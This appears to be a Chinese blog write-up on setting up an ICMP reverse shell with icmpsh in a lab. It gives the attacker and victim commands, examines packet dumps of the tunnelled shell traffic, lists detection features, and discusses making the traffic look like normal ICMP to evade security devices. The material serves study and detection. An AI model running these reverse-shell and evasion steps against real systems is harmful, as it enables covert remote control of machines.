ICMP隧道/通信数据包以及混淆流量绕过设备检测
前言:ICMP隧道/通信数据包学习
参考文章:https://github.com/inquisb/icmpsh/
参考文章:https://forum.butian.net/index.php/share/3864
参考文章:https://github.com/shadow1ng/fscan
icmpsh
使用的项目是:https://github.com/inquisb/icmpsh/
服务端:跨平台
客户端:只能在Windows平台上使用
⾸先linux执⾏:忽略网络中请求的echo包
sysctl -w net.ipv4.icmp_echo_ignore_all=1
攻击者机器执⾏python icmpsh_m.py 攻击者IP 受害者IP
python icmpsh_m.py 192.168.1.143 192.168.1.157
受害者机器执⾏icmpsh.exe -t 攻击者IP
icmpsh.exe -t 192.168.181.129
反弹shell成功!
自己感觉挺有意思的,所以顺便抓包观察下其中的流量通信
就让受害者机器执行icmpsh.exe -t 192.168.181.129
通过wireshark抓包发现,受害者会默认发送10个ICMP的请求包然后结束进程
第一个包中的ICMP数据 = ICMP信息头 + ICMP数据
0000 00 0c 29 43 a9 75 00 0c 29 24 a0 b8 08 00 45 00 ..)C.u..)$....E. 0010 00 5c 6d 90 00 00 ff 01 00 00 c0 a8 01 9d c0 a8 .\m............. 0020 01 8f 08 00 07 15 00 01 09 ed 4d 69 63 72 6f 73 ..........Micros 0030 6f 66 74 20 57 69 6e 64 6f 77 73 20 5b b0 e6 b1 oft Windows [... 0040 be 20 36 2e 31 2e 37 36 30 31 5d 0d 0a b0 e6 c8 . 6.1.7601]..... 0050 a8 cb f9 d3 d0 20 28 63 29 20 32 30 30 39 20 4d ..... (c) 2009 M 0060 69 63 72 6f 73 6f 66 74 20 43 icrosoft C
接着第二个:
0000 08 00 84 a3 00 01 09 ee 6f 72 70 6f 72 61 74 69 ........orporati 0010 6f 6e a1 a3 b1 a3 c1 f4 cb f9 d3 d0 c8 a8 c0 fb on.............. 0020 a1 a3 0d 0a 0d 0a 43 3a 5c 55 73 65 72 73 5c 41 ......C:\Users\A 0030 64 6d 69 6e 69 73 74 72 61 74 6f 72 5c 44 65 73 dministrator\Des 0040 6b 74 6f 70 3e ktop>
剩下的8个就一直发送默认报文格式的ICMP包
接下来当攻击机器执行python icmpsh_m.py 192.168.1.143 192.168.1.157
两边会基于ICMP进行通信,比如执行一个ipconfig
,查看下ICMP中的数据段
受害者会先接收到发送过来的命令ipconfig
,封装在ICMP数据段中
看下受害者机器执行了命令返回后的包如下,最大传输的数据段为64字节,默认ICMP包大小也就是64字节
特点
这里的特点实际上也可以作为后续的特征检测上面,如下列举几个点
- 返回的ICMP协议中的数据包中大小一直为64字节
- 传输的数据未经过加密处理
- sequence叠加
关于icmp协议流量混淆
这里就拿fscan来进行对比,这里会发现fascan的icmp末尾的32字节为空字节
从上面的过程中看起来,原生的icmp协议数据包末尾的32字节应该是随机的连续字符,如下图所示
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步